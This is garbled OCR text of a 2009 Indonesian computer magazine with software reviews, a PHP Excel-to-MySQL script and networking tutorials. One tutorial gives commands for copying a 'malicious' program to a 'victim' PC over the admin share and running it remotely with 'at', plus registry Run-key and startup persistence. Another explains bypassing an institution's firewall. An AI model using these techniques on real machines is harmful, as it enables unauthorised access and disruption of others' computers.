mudah dan menarik, memudahkan kita untuk menggunakannya. Bagi Diantaranya adalah TexNotesPRO.
pengguna high end komputer, tak ada salahnya untuk mencobanya, TexNotesPRO merupakan perangkat aplikasi yang menyediakan
dengan komputer yang cepat, proses pembukaan filepun akan lebih kemampuan menambahkan, mengedit dan mengatur catatan anda,
cepat lagi. Suatu keuntungan plus plus. mempublikasikan tulisan, gambar, dan lain sebagainya dalam satu
program. Saat anda pertama kali membuka program ini, maka anda
Tips akan disuguhkan dengan sampel dokumen disebelah tengah,
Untuk menjadikan Foxit pro sebagai program default pembuka file peralatan disebelah kanan, dan navigator disebelah kiri.
PDF di komputer anda, klik kananlah file PDF anda, lalu pilih open Terlihat seperti program Corel Draw, dan agak sedikit rumit, namun
with, akan keluar program-program yang bisa digunakan, carilah Foxit program ini didisain sedemikian rupa untuk memudahkan pengguna.
Reader, lalu centangkan tanda "Always use the selected program to Fitur-fitur yang ditawarkan meliputi tampilan yang bersih, user friendly,
open this kind of file", lalu klik ok.Maka Foxit Reader pun akan menjadi grafis antar muka standar windows, dan struktur dan penyimpanan file
program default khusus membuka file PDF dikomputer anda. didukung oleh GemX DobermanDB.

License : Freeware License : Trial


OS : Win95 / Win98 / WinME / WinNT / Win2k / WinXP / Vista OS : Windows 2000, XP
Sistem Requirement : Tidak ada persyaratan khusus Sistem Requirement :Tidak ada persyaratan khusus

.ilmuwebsite magazine | perdana 2009 44


.software .ilmuwebsite
.magazine e-learning community offline version

eTextrider >>> Reader/editor


eTextReader :: Viewer Buku Digital adalah eTextReader, HTML, Rich Text
Tampilannya menyerupai buku yang sedang Files(rtf), dan Zip files.
dibuka, memakai program ini anda serasa Tips
membaca buku nyata, namun dengan isi file- Bila anda hendak membaca file yang
file koleksi anda tentunya. Navigasi cukup berformat HTML sedang anda hanya benar
mengklik tombol kanan atau kiri keybord, benar ingin membaca teksnya saja tanpa
maka akan menuju halaman berikutnya atau harus melihat gambar, javascript dan
halaman sebelumnya dari file tersebut. lainnya, anda tidak perlu repot-repot
Lengkap dengan page number viewer mengatur browser anda agar tidak
dibagian atas kanan dan kiri. menampilkan hal-hal yang tidak perlu tadi.
Format file yang bisa dibaca oleh program ini Gunakanlah program kecil ini, dan anda

.Chat
Miranda Anim8or

Pidgin Portable :: Linux IM on Windows


Bagi pengguna Linux, mungkin akrab
dengan program kecil ini. Namun untuk
pengguna lingkungan windows,
mungkin tidak. Pidgin adalah program
opensource yang banyak hadir di tiap
distro linux. Kini, program ini bisa
dinikmati di OS windows. Selain itu, kami
juga menghadirkan versi Pidgin Portable
dalam CD yang kami sertakan.
Mengapa harus Pidgin? Padahal sudah
ada progam IM yang populer seperti YM.
Jawabannya ada pada sisi
kelengkapannya. Selain untuk chat
Miranda :: IM Sederhana untuk pengguna YM, Pidgin juga
melayani berbagai bentuk chat massege dari berbagai protokol.
Banyak program dengan fitur terbaik. Menawarkan tampilan yang wah Seperti Yahoo! Messenger, Jabber, IRC, OSCAR (AIM, ICQ), Gadu-
dan lengkap. Namun bila anda termasuk berbeda dari mereka, dan Gadu, .NET Messenger Service, Zephyr dan banyak lagi protokol
lebih mengutamakan kesederhanaan, maka cobalah program IM dengan kstabilan program yang menjadi nilai tambahnya lagi. Selain
Miranda ini. Tampilannya simple dan kompak. Tidak sama dengan itu, Pidgin juga mudah untuk digunakan.
program sejenis yang penuh fitur. Selain itu, pidgin juga bisa digunakan untuk multiuser. Maksudnya
Program ini mendukung berbagai protokol seperti AIM, IRC dan lain bisa digunakan bersamaan dengan dua ID YM atau lebih lainnya. Dan
sebagainya. juga bisa sekaligus menggunakan protokol lainnya seperti MiRC dan
lainnya.
Kekurangannya, miranda tidak mendukung video confrencing, Namun dengan kelengkapan itu, terdapat juga kelemahan-
ketersediaan theme dan game. kelemahan Pidgin, yaitu yang belum diupdate adalah tema
Kesimpulannya, Miranda merupakan program IM yang kecil, cepat, programnya yang terlalu simple, tidak mendukung webcame, dan tak
stabil, dan mendukung protokol yang lengkap. bisa digunakan untuk pesan suara.

License : Freeware License : Freeware


OS : Windows Vista, Windows XP, 2000 OS : Windows XP, 2000, 98, Me, NT
Sistem Requirement : None Sistem Requirement : Tidak ada persyaratan khusus

45 .ilmuwebsite magazine | perdana 2009


.ilmuwebsite software.
e-learning community offline version .magazine

.Browser
Portable Firefox Portable Safari

Portable Firefox :: Browser handal mudah dipakai Portable Safari :: Browser Mac OS on Flash

Fitur-fitur keamanan browser ini sudah tidak perlu diragukan lagi. Bila Firefox melekat pada image Linux, Internet Explorer pada
Paman google pun telah merekomendasikan penggunaannya. Firefox windows, maka Safari melekat pada image Mac OS. Dengan tampilan
yang senada dengan Mac OS, memudahkan para pengguna sistem
dikenal merupakan browser yang, aman dan stabil untuk membuka
operasi Mac OS milik Apple itu. Tak hanya Mac OS, Safari pun
berbagai situs yang ada di Internet. tersedia untuk lingkungan windows. Pun juga tersedia dalam bentuk
Dengan segala kemampuan dan fungsionalitasnya, kini firefox pun portable software.
hadir dalam versi portablenya. Safari terkenal dengan desainnya yang simple, elegant dan
Anda tinggal memasukannya kedalam flashdisk anda, lalu tinggal klik prosesnya yang cepat. Satu lagi pilihan untuk anda para penikmat
ganda file firefox anda. Anda pun siap menjelajahi Internet dengan internet. Pilih Firefox opera atau safari? Masing-masing punya
aman, dan nyaman. kelebihan dan kekurangannya. Silahkan anda mencobanya.

License : Freeware License : Freeware


OS : Windows Vista, 2003, XP, 2000, 98, Me, NT OS : Windows 2000, XP
Sistem Requirement : Tidak ada persyaratan khusus Sistem Requirement :Tidak ada persyaratan khusus

Opera | USB
terkesima, betapa cepatnya proses speed dialnya yang memudahkan kita untuk
pembukaan program tersebut. Ya memang memasuki situs yang sering kita kunjungi.
benar, program ini merupakan salah satu Bila suatu situs sering kita kunjungi, maka
contoh program yang cepat, stabil, dan situs tersebut akan terdaftar otomatis pada
mudah seperti halnya firefox. Tak mau kalah, speed dial yang ada pada layar new saat kita
kini dia pun hadir dalam versi portablenya, membuka program ataupun membuka tab
seakan tak rela bila para penggunanya baru. Tinggal memilih dan mengkliknya
beralih kepada browser portable program dengan mouse, kita pun akan menuju situs
lainnya. yang kita inginkan.
Opera hadir dengan tampilan yang elegant,
OperalUSB :: Browser Elegant formal dan bersih. Cocok untuk anda yang License : Freeware
Bukalah program Opera USB dari CD berjiwa gaya dan dinamis. OS : Win 95, Win98, WinXP, Vista
Sistem Requirement : None
bawaan majalah ini, lalu anda akan Satu hal yang terkenal dari Opera. Yaitu tools

.ilmuwebsite magazine | perdana 2009 46


.software .ilmuwebsite
.magazine e-learning community offline version

.Grapichs Viewers and Image Editor


GIMP Irfan View

GIMP :: Manimulasi photo Irfan View :: Buka file gambar jadi lebih mudah
Program ini ialah program yang sangat popular di dunia yang
GIMP singkatan dari GNU Image manipulation Program. Sesuai digunakan untuk membaca file grafis karena sangat ringan, cepat,
dengan singkatanya program ini digunakan untuk memanipulai dan simple, serta mempunyai feature yang cukup lengkap. Irfanview
gambar atau grafis dalam bentuk format bitmap. Kemampuan sudah dapat mengenali sebanyak 50-an format grafis termasuk
program ini dapat disandingankan dengan program top untuk format grafis untuk kamera digital dan juga format grafis lawas
memanipulasi gambar seperti Photoshop bagi para kalangan maunpun langka. Selain sebagai image viewer irfanview juga dapat
profesional. digunakan untuk pemutar audio. Keunggulan lainnya irfanview
Program ini awal mulanya sangat popular dikalangan pengguna linux. mampu mengelola grafis meskipun Cuma fungsi dasar saja seperti
Bagi pemakai photoshop jika ingin beralih ke GIMP untuk memanipulasi ukuran, crop, membuat tampilan panorama,
mempelajarinya terlebih dahulu karena cara penggunaannya sangat memanipulai warna dan brightness gambar serta beberapa efek
berbeda meskipun teknik dasarnya sama. gambar.

License : Freeware License : Freeware


OS : Windows 2000/XP/2003 Server/Vista, GTK+ Runtime OS : Win95 / Win98 / WinME / WinNT / Win2k / WinXP
Sistem Requirement : Tidak ada persyaratan khusus Sistem Requirement :Tidak ada persyaratan khusus

Inkscape

Inkscape adalah editor vector graphics seperti Illustrator, Freehand,


CorelDraw atau Xara X. freeware ini dapat meng import format
seperti JPEG, PNG, TIFF, dan lain lain dan mengeskport PNG
dengan baik sebagai multiple vector-based formats. Inkscape
menyediakan feature shape, path, text, markers, clones, alpha
blending, transforms, gradients, patterns, dan grouping

License : Freeware
OS : Win95 / Win98 / WinME / WinNT / Win2k / WinXP / Vista
Sistem Requirement : None

47 .ilmuwebsite magazine | perdana 2009


.ilmuwebsite software.
e-learning community offline version .magazine

.Media Tools (Audio/Video)


Audacity VLC Media Player

Audacity :: Edit file audio VLC Media Player :: Memutar beragam file multimedia

Dengan audacity kita dapat mengedit file wav, mp3, ogg, midi dan aiff VLC media player merupakan software pemutar beragam file
tanpa ada batasan. Fasiltas filter dapat digunakan untuk membuat multimedia, baik video maupun audio dalam berbagai format, seperti
suara-suara baru. Dan dapat me-ngemix beberapa track suara MPEG, DivX, Ogg, WMV dan lain lain.
audacity juga dapat menerima aneka plugin untuk menerapkan efek VLC media player juga dapat digunakan untuk memutar DVD, VCD,
khusus, atau untuk menghasilkan suara yang khas. Salah satu amupun CD. VLC media player bersifat open source dan tersedia
keunggulannya adalah bisa memasang plugin dari virtual studio untuk berbagai sistem operasi.
technology (VST) keluaran steinberg, yang merupakan aplikasi audio
editor komersial paling top saat ini, meskipun untuk itu anda harus
memasang VST enabler-nya terlebih dahulu.

License : Freeware License : Freeware


OS : Windows Vista, 2003, XP, 2000, 98, Me, NT OS : Windows 2000, XP
Sistem Requirement : Tidak ada persyaratan khusus Sistem Requirement :Tidak ada persyaratan khusus

Trilian .Text and Vice Messengers

Sekarang sebagain besar orang menggunakan klien Universal


Instant Messenger (UIM) yang bisa terhubung ke aneka klien IM..
kalau ICQ merupakan raja dari IM, maka Trillian adalah salah satu
UIM paling topsaat ini yang mendukung IM ternama seperti AIM
(AOL), ICQ, MSN (Microsoft), YM (Yahoo), dan IRC (klien OS UNIX).
Semua feature standar sebuah IM juga dimiliki oleh Trillian, misalnya;
audio chat, transfer file, chat room, icon, sms support, dan
sebagainya, termasuk feature khas yang dimiliki oleh IM standar
seperti, pesan terenkripsi (AIM/ICQ). Trillian juga memiliki feature
skin, sistem trigger untuk member tahu jia ada pesan masuk,
misalnya ratusan emoticons (gambar), dan emotisounds (gambar
dan suara).
License : Freeware
OS : Windows 2000, XP
Sistem Requirement :Tidak ada persyaratan khusus

.ilmuwebsite magazine | perdana 2009 48


.software .ilmuwebsite
.magazine e-learning community offline version

Thinstall versi 3.387

A
plikasi portable kini semakin lazim ditemui. Sifatnya yang portable di dalam drive c, anda pun dapat melakukannya selain
portable tentunya sangat membantu si penggunanya daripada drive c. Namun si pembuat software menyarankan dalam
melakukan pekerjaan kesehariannya, terlebih lagi di saat yang perakitan aplikasi portable direkomendasikan untuk dilakukan dalam
tidak memungkinkan untuk melakukan installasi software yang lingkungan sistem operasi yang masih bersih, dimana belum terinstall
dibutuhkan karena alasan tertentu, sebagai gantinya aplikasi portable aplikasi yang lain.
maju ke baris depan, siap digunakan untuk bertempur. Mempermudah
penggunanya melakukan pekerjaan sehari-hari, mulai dari aplikasi
perkantoran, desain grafis, mendengarkan musik, bahkan bermain
game sekalipun. Namun ada kalanya beberapa software penting yang
dibutuhkan tidak dimiliki dalam bentuk portable. Ini menjadi kendala
yang sangat menghambat tentunya. Ya, oleh karena itu dalam kategori
software di edisi majalah perdana kami mengangkat Thinstall, dengan
adanya aplikasi seperti Thinstall hal seperti ini tidak menjadi persoalan.
Thinstall versi 3.387 memang sengaja di disain untuk membuat aplikasi
portable dari aplikasi yang sudah ada. Cara kerjanya terbilang cukup
sederhana, Thinstall membandingkan kondisi registry sebelum dan
sesudah penginstallan aplikasi yang nantinya akan dijadikan aplikasi
portable. Sehingga registry yang berada di tengah kondisi ini yang
nantinya akan diambil sebagai keperluan untuk pembuatan aplikasi
portable. Kelebihan dari aplikasi Thinstall ini yaitu anda tidak hanya
dapat melakukan proses installasi software yang akan dijadikan

Active Password Changer


Professional v3.5

L
iburan yang panjang terkadang membuat lupa diri, lupa darat, dengan password yang baru. Fitur yang dimiliki oleh aplikasi ini cukup
lautan, udara, dan password akun anda dalam komputer beragam, anda tidak hanya dapat mengganti password windows dalam
tercinta. :D. Memang terdengar memaksa, tapi ada kalanya lingkungan windows itu sendiri, namun anda dapat menggunakan
kondisi lain di mana hal tersebut menyebabkan anda menjadi lupa akan dalam platform dos, selain itu active password changer dapat juga
akun milik anda sendiri. Tentunya hal ini sangat sering terjadi. Penulis dijadikan sebagai bootable untuk cd, floppy, maupun usb flash disk
seringkali mendapatkan keluhan-keluhan seperti ini dari orang-orang untuk keperluan pengembalian password suatu saat nanti jika
yang pernah mengalami kondisi seperti diatas. Sehingga tidak jarang dibutuhkan. Hal ini tentunya lebih efektif ketimbang harus menginstall
ditemui sikap berpasrah diri, legowo, dan istilah lain kerap kali aplikasi active password changer kemudian menjalankannya kembali
diucapkan ketika melakukan format ulang windows kesayangan hanya dalam platform windows setiap kelupaan password. Dengan active
karena masalah yang sepele. Lupa password. Bagi sebagian orang hal password changer anda tidak perlu melakukan format windows setiap
ini tidaklah menjadi masalah. Tapi bagi sebagian lain tentunya hal ini kali kelupaan password, atau hal lain seperti rutinitas pergi ke service
cukup menyesakkan dada. Sebenarnya hal ini tidaklah masalah, center gara-gara lupa password. Active password changer membuat
dengan active password changer anda dapat mereset password hidup anda lebih mudah. Untuk demo penggunaan active password
sebuah akun, ataupun mengganti password lama akun windows changer akan dijelaskan pada rubrik tutorial. Selamat mencoba.

49 .ilmuwebsite magazine | perdana 2009


.networking .ilmuwebsite e-learning community offline version
.magazine
Tutorial :
Melewati firewall admin
56 yang memblocking akses
chatting

Tutorial :

57
Menjalankan program
secara remote dalam
satu networking
Melewati Firewall Admin
yang memblocking
58
Tutorial :
VPS [virtual private server ] akses Chatting
Firewall memang menyebalkan, tetapi dibalik itu semua tentunya anda tidak akan
tinggal diam bila kebebasan anda terusik bukan?

Baiklah, kita mulai aksinya. Biasanya di dalam Tunnel. Bentuk inilah yang dapat melewati
lingkungan Institusi terdapat beberapa proteksi firewall admin dengan sangat mudah.
pelarangan akses ke beberapa layanan, salah HTTP Tunnel dibagi menjadi dua bagian, yakni
satunya Chatting yang digunakan untuk Server dan Client.
berkomunikasi dan bertukar informasi secara HTTP Tunnel Client merubah data (enkapsulasi)
live. ke dalam bentuk HTML untuk melewati tembok
Disini saya akan memperkenalkan suatu firewall dan selanjutnya dikirim ke HTTP Tunnel
program dengan konsep yang sederhana dan Server untuk di dekapsulasi ke dalam bentuk
sangat bermanfaat tentunya. HTTP Tunnel, aslinya.
begitulah namanya. Pernah dengar? ya, ini Kita ambil contoh salah satu perusahaan besar
adalah program yang dapat anda andalkan bila Yahoo! yang menyediakan layanan Chatting
mengalami proteksi firewall Admin yang dengan program Yahoo! Mesengger . Kita
menyebalkan. memerlukan beberapa software tambahan
HTTP Tunnel bekerja dengan cara merubah untuk malancarkan aksi ini. Program tambahan
.networking

format data chatting dll ke dalam bentuk HTML. ini adalah SocksCap yang bisa di download dari
Hal inilah yang menjadi inti program HTTP http://www.socks.permeo.com program ini

Gambar 1 : HTTP Tunnel

56 .ilmuwebsite magazine | perdana 2009


e-learning community offline version .ilmuwebsite .networking
.magazine

berguna untuk mencatat semua komunikasi Socks Server, saatnya anda memilihkan
dan selanjutnya mentransfer ke HTTP program Yahoo!Messengger dengan meng-
Tunnel Client. Baiklah sekarang kita lakukan klik FILE ?NEW?BROWSE (Arahkan pada
installasi SocksCap dan saya anggap anda Ypager.exe yang berada pada directory
telah berhasil melakukannya. tempat anda menginstall aplikasi
Mulailah mengatur konfigurasi pada Yahoo!Messengger.
program sockscap yang telah terinstall. Baiklah, kini saatnya anda melepaskan
Isikan bagian SOCKS Server dengan alamat borgol yang mengikat tangan anda, dan
HTTP Tunnel Client “127.0.0.1” dengan port berlarilah keujung dunia untuk menghirup
1080. udara kebebasan sebagai manusia.
Kemudian pilih Socks versi 5 , Name Mulailah dengan mengklik tombol RUN
Resolution pilih Attempt local then remote. dankini anda telah terkoneksi dengan
OK. Tunnel Client “127.0.0.1” dengan port layanan Chatting Yahoo! Messengger.
1080. Kemudian pilih Socks versi 5 , Name [ peterpanz ]
Resolution pilih Attempt local then remote.
OK. Setelah selesai melakukan konfigurasi Gambar2 : Settingan pada SocksCap

Menjalankan Program
secara Remote
dalam satu Networking
Mengcopykan file jahat ke computer korban memanglah mudah. Tetapi untuk menjalankan
program tersebut adalah masalah yang berbeda.

1001 cara menuju Cina. Mungkin itulah kata hal ini memiliki spesifikasi tertentu pula pada 2. Memanipulasi file win.ini dan system.ini
yang tepat untuk menggambarkan tutor kali ini. system operasi yang digunakan oleh korban. Cara ini hanya berlaku pada sitem operasi
Pernahkah anda berfikir untuk menjalankan Windows 9x dan Me. Sedangkan untuk XP dan
sebuah program yang anda buat untuk 1. Melakukan perubahan pada Registry. 2003 sudah tidak menggunakan file ini lagi.
dijalankan secara remote dikomputer lain? Untuk melakukan perubahan registry secara
Misalnya, anda membuat program remote, Hacker terlebih dahulu harus Berikut contoh entry untuk dimasukkan dalam
shutdown.exe untuk kepentingan Shutdown mendapatkan Hak penuh Administrator file win.ini dan system.ini :
PC kantor, warnet atau bahkan computer computer korban. Banyak software untuk
korban yang ingin anda jahili?? Tak perlu mendapatkan password Administrator salah Win.ini
Run=C:\WINDOWS\SYSTEM\shutdown.exe
berlama-lama langsung saja kita jalankan satunya John the ripper yang tidak akan Load=System.ini
jurusnya. penulis bahas disini. Cara lainnya dengan [boot]
Mengcopykan file jahat ke computer korban mengetikkan Command pada menu Run Shell=Explorer.exe
memanglah mudah. Tetapi untuk menjalankan Lusrmgr.msc dan rubahlah pass admin dengan C:\WINDOWS\SYSTEM\shutdown.exe
program tersebut adalah masalah yang pass baru anda (yang saya herankan disini
berbeda. Seandainya program telah berhasil Microsoft tidak meminta password lama untuk 3. Menyimpan program pada Direktori
anda copykan ke computer korban, maka bila mengganti password baru). Haha.. startup.
ingin menjalankannya seorang hacker tidak Dan inilah dia lokasi penyimpanannya :
bisa langsung mengklik program tersebut. My Computer\ Directory startup adalah dir khusus pada
Karena bila mengkliknya, otomatis HKEY_LOCAL_MACHINE\SOFTWARE\Micr windows untuk menjalankan program secara
komputernya-lah yang akan menjalankan osoft\Windows\CurrentVersion\Run otomatis ketika computer dihidupkan. Bisa
program itu. Kata bang Mamat waktu smp My Computer anda lihat pada menu START?PROGRAMS
“ibarat senjata makan tuan”, tentunya anda \HKEY_LOCAL_MACHINE\SOFTWARE\Micr ?STARTUP. Lokasi penyimpanan file startup
tidak ingin seperti ini bukan? osoft\Windows\CurrentVersion\Runonce bisa anda lihat di : C:\Documents and
Lalu bagaimana menjalankan program pada My Computer Settings\%namauser%\Start
computer remote ? \HKEY_LOCAL_MACHINE\SOFTWARE\Micr Menu\Programs\Startup (NT, 2000, XP)
Ada beberapa cara yang bisa dilakukan, dan osoft\Windows\CurrentVersion\RunonceEx C:\WINDOWS\Start Menu\Programs\Startup

.ilmuwebsite magazine | perdana 2009 57


.networking .ilmuwebsite e-learning community offline version
.magazine

(9x, Me) Microsoft Windows XP [Version


\\192.168.100.20 . terlihat waktu pada
4. Scheduling dengan perintah AT 5.1.2600] (C) Copyright 1985-2001 computer korban menunjukan pukul 7:37 AM
Microsoft Corp.
Ini merupakan teknik yang paling efisien Langkah akhir yang paling menentukan
menurut saya, karena Hacker tidak perlu C:\Documents and Settings\User>CD\ keberhasilan ini adalah perintah scheduling
menunggu computer korban untuk melakukan C:\>net use x: \\192.168.100.20\c$
yang tepat. Terlihat waktu yang ditunjukan
startup. Berikut saya perlihatkan beberapa /user:administrator passwordnyaapa pada computer korban pukul 7:37 AM , maka
contoh penggunaan cara ini, yang akan saya memberikan perintah scheduling dengan
The command completed successfully.
membuat computer korban yang diremote command at \\192.168.100.20 7:40A
C:\>copy shutdown.exe x: “c:\shutdown.exe” untuk menjalankan program
bertekuk lutut dihadapan anda ?
1 file (s) copied.
Hal pertama yang saya lakukan adalah shutdown.exe pada pukul 7:40 AM , tepatnya 3
melakukan Mapping drive c: dari computer C:\>net time \\192.168.100.20 menit berikutnya. Anda dapat menentukan
Current time at \\192.168.100.20 is
korban (192.168.100.20 ) menjadi drive x: pada 2/21/2008 7:37 AM waktu yang berbeda sesuai dengan waktu
computer saya. Terlihat bahwa account yang yang ingin anda tetapkan.
The command completed successfully.
digunakan adalah Administrator dengan Untuk melihat dan memastikan bahwa
password “passwordnyaapa”. C:\>at \\192.168.100.20 7:40A serangan anda berhasil, silahkan melakukan
“c:\shutdown.exe”
ping atau cek scheduling yang telah anda buat
Setelah koneksi diterima, saya memberikan Added a new job with job ID = 1 tadi dengan menggunakan command at
perintah copy shutdown.exe x: yang bertujuan \\192.168.100.20
C:\>at \\192.168.100.20
mengcopykan file shutdown.exe ke computer StatusID Day Time Command Line Tugas anda telah selesai, silahkan duduk dan
------------------------------------- buatlah secangkir kopi untuk menunggu waktu
korban. (dengan asumsi drive x saya adalah 1 Today,7:40 AM c:\shutdown.exe
drive c: computer korban) Kemudian disini kemenangan anda ? . Salam. [ peterpanz ]
C:\>at \\192.168.100.20
saya melakukan penyesuaian waktu / jam
There are no entries in the list.
computer korban dengan command net time

VPS ( Virtual Private Server )


Dengan VPS, anda dapat
menggunakan VPS layaknya komputer pribadi.

VPS (Virtual private server), Ya mungkin kata digunakan sebagai webserver. Adapun yahoo maupun server hosting berada tak jauh
itu sudah tidak asing lagi bagi anda penggemar beberapa kelebihan dari VPS yaitu : dari sana. Anda akan mendapatkan layanan
dunia IT. Itulah yang akan kita bahas disini. Kali ? Listrik dijamin tidak akan padam, dengan storage data yang besar. Adapun cara
ini penulis hanya memfokuskan salah satu kata lain program yang anda jalankan pada mengaksesnya akan penulis jelaskan pada
perusahaan yang menyediakan layanan VPS, server VPS akan terus Online 24 jam non- bagian lain.
yaitu SWVPS. Website resminya bisa anda stop. Bila ingin dipertimbangkan hal ini Anda sudah tidak sabar ingin menggunakan
kunjungi pada link www.swvps.com . merupakan nilai layanan yang sangat berharga layanan ini? Baiklah langsung saja kita mulai
Perusahaan ini memberikan layanan server bagi kita karena mendapatkan jaminan dan cara mengaksesnya mulai dari awal. Pada
seperti layaknya komputer pribadi yang dapat service yang nyaman bagi bisnis yang kita Windows :
online 24 Jam Non-Stop. Bisa kita bayangkan jalankan. Pilih START Menu =>> All Programs =>>
betapa berharganya layanan ini bila melihat ? Kekuasaan tertinggi dipegang oleh anda. Accessories =>> Communications =>>
kondisi pasokan listrik Negara kita yang kurang Baik dalam penginstallan program sampai Remote Desktop Connection
memuaskan konsumen. Ups, maaf bila ada maintenance andalah yang menentukannya.
pihak yang tidak berkenan dengan kata-kata Misalnya, anda ingin melakukan Shutdown
saya ini. Baiklah kita lanjut ke topic computer untuk perawatan atau keperluan
permasalahan. Dengan VPS anda dapat teknis lainnya.
menggunakan VPS layaknya komputer ? Proses upload maupun download bisa
pribadi. Pada umumnya VPS digunakan untuk diproses dengan sangat cepat. Hal ini
keperluan Trading Forex yang menggunakan dikarenakan server VPS menggunakan
Platform MetaTrader (MT4). Tidak hanya itu, computer dengan server yang berada di US
masih banyak lagi kegunaan VPS ini misalnya dan pada umumnya perusahaan besar seperti Gambar 1. Tampilan awal memulai remote desktop

58 .ilmuwebsite magazine | perdana 2009


e-learning community offline version .ilmuwebsite .networking
.magazine

Gambar 2 : Tampilan menu general Gambar 5. Tampilan komputer VPS yang berhasil login

Pada textbox isilah dengan alamat IP telah Berikut tampilan Komputer VPS yang telah Untuk login, anda dapat mengaksesnya
diinformasikan pada anda. Biasanya melalui berhasil Login dan terkoneksi. Remote melalui Link VIRTUOZZO anda yaitu https://(ip
email pada saat anda melakukan registrasi.
Desktop akan menampilkan Komputer Server anda):4643 Untuk Melakukan maintenance
Informasi ini berupa Password, username dan
alamat akses VIRTUOZZO anda yang lokasinya ada di tempat lain. (VPS) Pilih Start Menu - Shutdown Selanjutnya
Baiklah setelah melakukan setting VPS dan pilih Restart dan Application: Maintenance

Gambar 3. Tampilan menu display Gambar 6. Tampilan login virtuozzo Gambar 8. Tampilan shut down

Untuk memaksimalkan kinerja VPS anda bisa optimalisasi koneksi, sekarang saatnya kita (planned). Tunggu beberapa menit dan akses
mengurangi Bit color pada Tab display. Pilih melakukan login dan mengupload file yang kembali layanan VPS anda dengan cara pada
pada resolusi 800 x 600 pixels dan Color pada ingin kita simpan pada storage server melalui Gambar 1. Tips : Biasanya pada Komputer
layanan VIRTUOZZO. Rental seperti warnet akan memblokir layanan
ini dengan alasan keamanan user lain.
Bukalah teks editor kesayangan anda dan
ketikkan beberapa Mantra. Berikut Command-
nya : “ Mstsc.exe “ tanpa tanda petik. Dan save
file tersebut dengan extensi .BAT ex.
Mamat.bat Ok sekarang eksekusilah file
Gambar 4. Tampilan menu experience tersebut, dan akan keluar layanan Remote
Desktop seperti yang terlihat pada gambar 1.
256.
Demikian tutorial singkat dari penulis, semoga
Pada TAB Experience, ubahlah setting
Gambar 7. Tampilan upload file di virtuozzo bermanfaat [peterpanz]
connection speed menjadi Modem (28,8 Kbps)

.ilmuwebsite magazine | perdana 2009 59


.ilmuwebsite e-learning community offline version
.tips dan trik .magazine

Tips dan trik : web


Melakkan konversi file excel
50 mnjadi mysql
Tips dan trik : web
Melakukan konversi file excel menjadi mysql
Tips dan trik : aplikasi
53 WinRAR v.4.56 Terkadang konversi laporan harian dari excel ke dalam bentuk lain menjadi begitu penting, terlebih lagi
jika sang bos menginginkan laporan harian yang penuh dengan baris dan kolom tersebut dijadikan ke
dalam bentuk database, yang kemudian nantinya akan diolah lebih lanjut untuk dijadikan system
Tips dan trik : aplikasi informasinya
Membuat Aplikasi Portable
54 dengan Thinstall

excel to mysql
converter

N
ah pertanyaan sekarang adalah, Source Codenya
bagaimana merubah file excel ke Simpan script php di bawah ini dengan nama
.tips dan trik

dalam bentuk database mysql? Ya, excel2sql.php, kemudian letakkan pada direktori
penulis akan jelaskan di sini selengkapnya, dimana program php itu berada, penulis
sedetil-detilnya dengan cara seksama dan dalam menyimpannya di dalam c:\program
tempo yang sesingkat-singkatnya. :D files\xampp\php.

<?php
Telah diketahui bersama, Microsoft Excel
$tables = array();
versi 2003 ke atas sudah mendukung adanya $indata = 0;
format universal, yakni XML. Dan telah diyakini
jika XML merupakan format file yang akan berlaku function encode( $text )
{
di masa depan nanti. Dalam arti format inilah yang
$text = preg_replace( "/'/", "''", $text );
nantinya akan digunakan sebagai standarisasi return "'".$text."'";
untuk semua tipe file aplikasi yang ada, entah itu }
word, excel, powerpoint, ataupun aplikasi-aplikasi
lain yang tentunya di dalam aplikasi yang function start_element( $parser, $name,
$attribs )
berkaitan telah di sediakan fasilitas xml-nya. Nah {
untuk Microsoft excel versi 2003 ke atas sudah global $tables, $indata;
disediakan fasilitas untuk menyimpan if ( $name == "WORKSHEET" )
spreadsheet termasuk macronya, kedalam bentuk {
$tables []= array(
xml. 'name' =>
$attribs['SS:NAME'],
Nah apa yang harus dilakukan selanjutnya 'data' =>
adalah, menggunakan script php sederhana yang array()
);
dapat memparsing xml yang dihasilkan dari file }
excel tersebut kedalam bentuk database dengan if ( $name == "ROW" )
memanfaatkan fasilitas XML Dom ( document {
object model ) yang ada pada library PHP. Dengan
$tables[count($tables)-1]['data'] []= array();
kata lain fasilitas XML dari kedua belah pihak, }
yakni microsoft excel dan php5 digunakan if ( $name == "DATA" )
sebagai jembatan yang dimanfaatkan oleh script {
ini untuk melakukan konversi file ecxel ke dalam $indata = 1;
}
database mySQL.

50 .ilmuwebsite magazine | perdana 2009


e-learning community offline version .ilmuwebsite .tips dan trik
.magazine

}
function text( $parser, $text )
{
global $tables, $indata;
if ( $indata )
{

$data =& $tables[count($tables)-1]['data'];


$data[count($data)-1] []= $text;
}
}
function end_element( $parser, $name )
{
global $indata;
if ( $name == "DATA" )
Gambar 1 : contoh dokumen excel
$indata = 0;
}
$parser = xml_parser_create( ); Ya, langkah selanjutnya save as dokumen tersebut, ke dalam
xml_set_element_handler( $parser, "start_element",
bentuk XML Spreadsheet (*.xml, di sini penulis meletakkannya di
"end_element" );
direktori c:\Another :
xml_set_character_data_handler( $parser, "text" );
while( !feof( STDIN ) ) {
$text = fgets( STDIN );
xml_parse( $parser, $text );
}
xml_parser_free( $parser );
foreach( $tables as $table )
{
$name = $table['name'];
$data =& $table['data'];

@$cols = implode( ",", $data[0] );


$cols = strtolower(str_replace(" ","_",$cols));

for( $in = 1; $in < count( $data ); $in++ )


{
$sqldata = implode( ", ", array_map(
"encode", $data[$in] ) );
?>
INSERT INTO <?php echo( str_replace(" Gambar 2 : tampilan save as XML
","_",strtolower($name) ))?> ( <?php echo( $cols ) ?> )
VALUES ( <?php echo( $sqldata ); ?> );
<?php Dokumen yang baru di save ke dalam type file xml tersebut apabila
} dibuka dengan editor notepad, bentuk standarnya akan terlihat seperti
} ini :
?>
<?xml version="1.0"?>
<?mso-application progid="Excel.Sheet"?>
<Workbook xmlns="urn:schemas-microsoft-
Cara Penggunaannya
com:office:spreadsheet"
Langkah awal yang harus di lakukan adalah membuat satu xmlns:o="urn:schemas-microsoft-com:office:office"
dokumen excel baru, atau jika anda akan menggunakan dokumen yang xmlns:x="urn:schemas-microsoft-com:office:excel"
sudah ada, buat bentuk sederhana dari dokumen tersebut, kira-kira xmlns:ss="urn:schemas-microsoft-com:office:spreadsheet"
bentuknya, dengan awal mulanya seperti ini : xmlns:html="http://www.w3.org/TR/REC-html40">
Di gambar terlihat saya telah menghapus sheet yang tidak akan <DocumentProperties xmlns="urn:schemas-microsoft-
digunakan nantinya. Ini dilakukan sebagai upaya penghematan com:office:office">
